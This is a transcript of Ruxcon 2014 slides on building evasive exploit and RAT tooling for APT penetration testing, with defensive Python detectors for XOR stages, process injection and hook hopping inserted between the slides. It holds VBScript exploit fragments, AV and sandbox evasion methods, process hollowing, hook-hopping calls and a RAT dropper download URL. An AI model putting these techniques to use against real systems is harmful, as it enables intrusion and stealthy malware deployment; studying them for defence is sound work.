Transcript of: Writing Zero Days for Security... (Ruxcon 2014, Oct 12, 2014), source 2014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security...
Page 1
Oct 12, 2014
Ruxcon 2014
Page 2
Sophos
Symantec
Westpac
FireEye
Kaspersky
Working on a PhD at University of Federation
Page 3
Help discover vulnerable points of an enterprise using a controlled, near-zero-day APT
Evaluate zero day readiness (resiliency) of solutions deployed in enterprise security infrastructure
Create an easy-to-maintain attack platform for APT pen testing that addresses all aspects of the battle between attackers and defenders (i.e. anti-analysis and anti-detection)
Page 4
Create a sustainable model for APT penetration testing
Cost-effectively evading corporate security infrastructure
Modular implementation of zero day exploits and malware
Page 5
Web Gateway, NIDS, NIPS
Spam Filter
Sandbox Security
SOE Patch Management
Endpoint Security
Internet
Page 6
Diversity – shuffling, randomisation, …
…and do it in an easy way
Page 7
Page 8
APT Penetration Testing
Page 9
ROP
Shellcode
Heap Spray
Exploit Trigger
Dropper
RAT
RAT Control
C&C
Delivery
Page 10
Page 11
Page 12
ROP gadgets can be customized for a given implementation (the mona plugin and Metasploit come in handy)

Understanding exploits
- CVE details
- Available DLLs
- ASLR, other methods
- ROP gadget
- Metasploit module write-up

Evasion method
- Metamorphism
- Include unnecessary API calls
- Use of different APIs achieving the same goal
- Hook hopping to bypass EMET
Page 13

```vbscript
For k = zero To underflow Step -1
    RemoveEntry(k)
Next

Sub RemoveEntry(index)
    Dim a
    a = CLng(index)
    required_claims.remove(a)
End Sub
```

```vbscript
For k = zero To underflow Step -1
    required_claims.remove(CLng(k))
Next
```
Page 14

```vbscript
massage_array_length = 5493
Dim massage_array(5493)
For i = zero To massage_array_length
    Set massage_array(i) = document.createElement("object")
Next
```
Page 15
AV Evasion
Do AVs have signatures for shellcode or heap-spraying code?
Do AVs execute JS in a sandbox?
Strategy
Encode the shellcode with a custom (or different) algorithm.
Rewrite the shellcode: use ROR/ROL/XOR to encrypt the main code and prepend a decoding routine to the shellcode.
Metamorphism on JS (junk code).
Rewrite the heap-spraying module: this bypasses signatures, but most heuristics should still be able to find it, even if it is encrypted/encoded/obfuscated (finally you have to somehow allocate memory, eh :P).
Page 16
1st stage
- Decryption
  - Simple XOR
  - Rolling XOR (Visual decrypt)
  - Polymorphic XOR (Office 2010 payload)
- API call obfuscation
  - API name hash
  - Hook hopping
- Dropper download
  - Various methods
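A decoder for the simple and rolling XOR stages listed above, written from the analyst's side (an added example, not code from the slides): it recovers the key of a captured first-stage blob by brute force, scoring each candidate against API names a dropper stage is expected to reference. The marker strings, the sample blob, and the assumption that "rolling XOR" means a key advanced by a fixed step per byte are this example's own.

```python
from itertools import product
from typing import Dict

# Known-plaintext markers an analyst expects in a decoded dropper stage
# (API names the slides list); constructed for this example.
MARKERS = [b"URLDownloadToFileA", b"CreateFileA", b"WinExec", b"MZ"]


def xor_simple(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key for b in data)


def xor_rolling(data: bytes, key: int, step: int) -> bytes:
    """Rolling XOR (assumed scheme): the key advances by `step` after each byte."""
    out = bytearray()
    k = key
    for b in data:
        out.append(b ^ k)
        k = (k + step) & 0xFF
    return bytes(out)


def score(plain: bytes) -> int:
    """Weight hits by marker length so one long API name beats chance 'MZ' hits."""
    return sum(len(m) * plain.count(m) for m in MARKERS)


def recover_key(blob: bytes) -> Dict[str, object]:
    """Brute-force simple XOR (256 keys) and rolling XOR (256 keys x 255 steps)
    and return the best-scoring candidate together with its decoded bytes."""
    best = {"scheme": "none", "key": None, "step": None, "score": 0, "plain": blob}
    for key in range(256):
        plain = xor_simple(blob, key)
        s = score(plain)
        if s > best["score"]:
            best = {"scheme": "simple", "key": key, "step": None, "score": s, "plain": plain}
    for key, step in product(range(256), range(1, 256)):
        plain = xor_rolling(blob, key, step)
        s = score(plain)
        if s > best["score"]:
            best = {"scheme": "rolling", "key": key, "step": step, "score": s, "plain": plain}
    return best


# Constructed sample stage (not a real payload): two NOPs and the API names,
# encoded once with the slides' example key 0x9C and once with a rolling key.
STAGE = b"\x90\x90URLDownloadToFileA\x00CreateFileA\x00WinExec\x00"
SAMPLE_SIMPLE = xor_simple(STAGE, 0x9C)
SAMPLE_ROLLING = xor_rolling(STAGE, 0x41, 3)

if __name__ == "__main__":
    for name, blob in (("simple", SAMPLE_SIMPLE), ("rolling", SAMPLE_ROLLING)):
        r = recover_key(blob)
        print(name, r["scheme"], hex(r["key"]), r["step"], r["plain"])
```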
Page 17
Exploit
Test matrix (columns: exploit, heapspray, ROP, shellcode, PASS):

```text
exploit  heapspray  ROP  shellcode  PASS
√
√ √
√ √
√ √ √
√ √ √
√ √ √ √
…
```
Page 18
APT Penetration Testing
Page 19
Dropper
Trusted Windows Process
malicious
1. Launch
2. Inject/unpack
2nd stage binary
Page 20
Dropper
Trusted Windows Process
malicious
Page 21
Page 22
Metamorphism Fundamentals
Simple techniques
- Adding varying lengths of NOP instructions
- Permuting register use
- Adding useless instructions and loops
More advanced
- Function reordering
- Program flow modification
- Static data structure modification
Page 23
Find out what’s wrong with this code.

```asm
.text:0040C5E7 mov al, byte_41474C
.text:0040C5EC push 9BE3D3Ch
.text:0040C5F1 push offset aFreeze_handToD ; "Freeze_Hand to %d %d inish\n"
.text:0040C5F6 push eax
.text:0040C5F8 push ebx
.text:0040C5F9 push offset aPowerTxagccont ; "Power/TxAgcControllegal Module"
.text:0040C5FE call sub_40BF42
.text:0040C603 cmp esi, dword_4146C4
.text:0040C609 mov byte ptr [ebp+var_4], al
.text:0040C60C lea eax, [ebx-1E50h]
.text:0040C612 jle short loc_40C650
.text:0040C614 push 6Eh
.text:0040C61B push 0FFFFFFB7h
.text:0040C61D mov ebx, eax
.text:0040C61F call sub_41071F
```
Page 24
Page 25
APT Penetration Testing
Page 26
Obfuscation
Metamorphism
Polymorphism
Page 27
Memory
- Embedded encrypted malware PE files
- Unpacked directly into target memory location
File/Registry
- Installs encrypted binaries into file or registry
- Consists of PE loader and malware PE files
- Unpacked into target memory
Page 28
Decrypts the PE loader and injects it into svchost or explorer
Process hollowing: run svchost and write to its process memory
OR
Run standard dynamic-allocation/injection-based stealth.
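Detection logic for the injection targets named above, written as an added example that is not from the slides: it scans constructed process-creation and remote-thread records shaped like Sysmon event IDs 1 and 8 and flags a svchost.exe that was not started by services.exe (the normal parent of every service host) or lacks the -k service-group switch, and a remote thread created in svchost.exe or explorer.exe from a binary outside the Windows directory. The Sysmon field names are real; the paths, user, process names and the allowlists are this example's own.

```python
from typing import Dict, List

Event = Dict[str, str]

# Constructed Sysmon-style records (EventID 1 = process create,
# EventID 8 = CreateRemoteThread). Paths, user and images are made up.
EVENTS: List[Event] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": "1", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe"},
    {"EventID": "8", "SourceImage": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": "8", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
]

# Processes the slides name as injection targets, and the only parent a
# service host normally has. Tune the allowlists for your own estate.
INJECTION_TARGETS = {"svchost.exe", "explorer.exe"}
SVCHOST_PARENTS_OK = {"services.exe"}
WINDOWS_DIR = "c:\\windows\\"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hollowed_svchost(ev: Event) -> bool:
    """Process-create of svchost.exe from an unexpected parent, or without
    the -k service-group switch every legitimate service host carries."""
    if ev["EventID"] != "1" or basename(ev["Image"]) != "svchost.exe":
        return False
    bad_parent = basename(ev["ParentImage"]) not in SVCHOST_PARENTS_OK
    no_group = " -k " not in ev["CommandLine"].lower()
    return bad_parent or no_group


def foreign_remote_thread(ev: Event) -> bool:
    """CreateRemoteThread into an injection target from a source binary
    that does not live under the Windows directory."""
    if ev["EventID"] != "8" or basename(ev["TargetImage"]) not in INJECTION_TARGETS:
        return False
    return not ev["SourceImage"].lower().startswith(WINDOWS_DIR)


def alerts(events: List[Event]) -> List[str]:
    """One alert line per suspicious record, in input order."""
    out = []
    for ev in events:
        if hollowed_svchost(ev):
            out.append(f"svchost from {ev['ParentImage']}")
        elif foreign_remote_thread(ev):
            out.append(f"remote thread {ev['SourceImage']} -> {ev['TargetImage']}")
    return out


if __name__ == "__main__":
    for line in alerts(EVENTS):
        print(line)
```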
Page 29
HTTP Back Connect (Proxy/Firewall evasion)
Conditional activation depending on VM/Emulator presence (sandbox evasion)
Delayed execution (sandbox evasion)
Page 30
APT Penetration Testing
Page 31
Victim (Windows), Attacker (Windows), C&C (Linux)
1. Exploit
2. Drop
3. Register
4. Remote Access
5. Remote Access
Page 32
Many RATs have direct P2P communication.
Reasoning
- Static IP/DNS required for RAT to beacon out
- Minimise exposure of attacker machine
- Hiding in the cloud of C&Cs is safer
Page 33
Page 34
Page 35

```text
GetTempPathA
URLDownloadToFileA
CreateFileA (Open encrypted file)
SetFilePointer
GetFileSize
VirtualAlloc
ReadFile
Decrypt
ReadFile
WriteFile
CloseHandle
HookHoppingWinExec = kernel32!WinExec+5
HookHoppingWinExec(stack_buffer)
```
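A sandbox-side check for the call sequence above (an added example, not the slides' code): it maps each address the stage transferred control to in a constructed API trace back to an export, flags targets that land a few bytes past an export's entry, which is what a hook-hopped call such as kernel32!WinExec+5 looks like to a tracer, and flags the download-then-execute order. The export addresses and the trace are invented, and the 16-byte prologue window is an assumption.

```python
from typing import Dict, List, Optional, Tuple

# Constructed export table for the example: name -> entry address.
# Real addresses differ per build; these values are invented.
EXPORTS: Dict[str, int] = {
    "urlmon!URLDownloadToFileA": 0x7D4A3B60,
    "kernel32!CreateFileA": 0x7C801A28,
    "kernel32!WriteFile": 0x7C810E27,
    "kernel32!WinExec": 0x7C86250D,
}

# Offsets in [1, MAX_PROLOGUE) count as "entered past the prologue", i.e.
# past the bytes an inline hook overwrites (assumed window size).
MAX_PROLOGUE = 16


def resolve(target: int) -> Tuple[Optional[str], int]:
    """Map a call target to (export name, offset from entry); (None, -1) if
    the address is not within MAX_PROLOGUE bytes of any known export."""
    for name, entry in EXPORTS.items():
        if entry <= target < entry + MAX_PROLOGUE:
            return name, target - entry
    return None, -1


def hook_hops(trace: List[int]) -> List[Tuple[str, int]]:
    """Calls that entered an export at a non-zero offset: hook hopping."""
    hops = []
    for target in trace:
        name, off = resolve(target)
        if name is not None and off > 0:
            hops.append((name, off))
    return hops


DOWNLOAD_EXEC = ["urlmon!URLDownloadToFileA", "kernel32!WinExec"]


def download_then_execute(trace: List[int]) -> bool:
    """True if the trace calls URLDownloadToFileA and later WinExec, in that
    order (other calls may sit between), whatever offset each was entered at."""
    want = iter(DOWNLOAD_EXEC)
    need = next(want)
    for target in trace:
        if resolve(target)[0] == need:
            need = next(want, None)
            if need is None:
                return True
    return False


# Constructed trace of the dropper stage: download, write the decrypted
# file, then run it through WinExec+5 (skipping a 5-byte inline hook).
TRACE = [
    EXPORTS["urlmon!URLDownloadToFileA"],
    EXPORTS["kernel32!CreateFileA"],
    EXPORTS["kernel32!WriteFile"],
    EXPORTS["kernel32!WinExec"] + 5,
]

if __name__ == "__main__":
    print("hook hops:", hook_hops(TRACE))
    print("download-then-execute:", download_then_execute(TRACE))
```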
Page 36
Page 37
Build pipeline diagram (labels as extracted from the slide):

```text
2013-3893.asm
Rat.exe.bin  Rat.exe
"http://aptpentest.com/?f=Rat.exe.bin"
Genshell.py
xor.asm
2013-3893.s1
2013-3893.s2
2013-3893.s3
nasm
+
0x9C
nasm  xor-0x9C.bin
+
raw2uni  2013-3893.uni
xor-0x95
```
Page 38
Assembly source (Use IDA export and some manual work)
Page 39
No PE header. Obfuscated as expected…
Page 40
Page 41
Page 42
xor-0x9C.bin
Page 43
Page 44
Binary Obfuscation
Packaged Injection
The injector injects the main malware into a svchost, explorer, or web browser process.
The injector is separate from the main malware, allowing reuse of the core malware while staying undetected: only the injector code needs to be modified, with minimum effort.
The injector also needs to unpack or decode the core malware (see the McRat example) before injection.
Page 45
Page 46
Page 47
Page 48
Page 49
APT Penetration Testing Framework
Page 50
Page 51